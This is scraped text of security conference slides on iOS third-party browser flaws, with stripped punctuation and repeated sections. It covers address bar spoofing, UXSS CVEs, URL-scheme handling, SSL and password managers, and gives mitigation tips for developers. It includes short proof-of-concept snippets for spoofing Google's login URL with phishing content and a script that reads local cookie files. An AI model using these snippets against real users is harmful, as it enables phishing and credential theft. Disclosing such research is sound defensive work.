bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 8: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/8.jpg)
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 9: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/9.jpg)
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
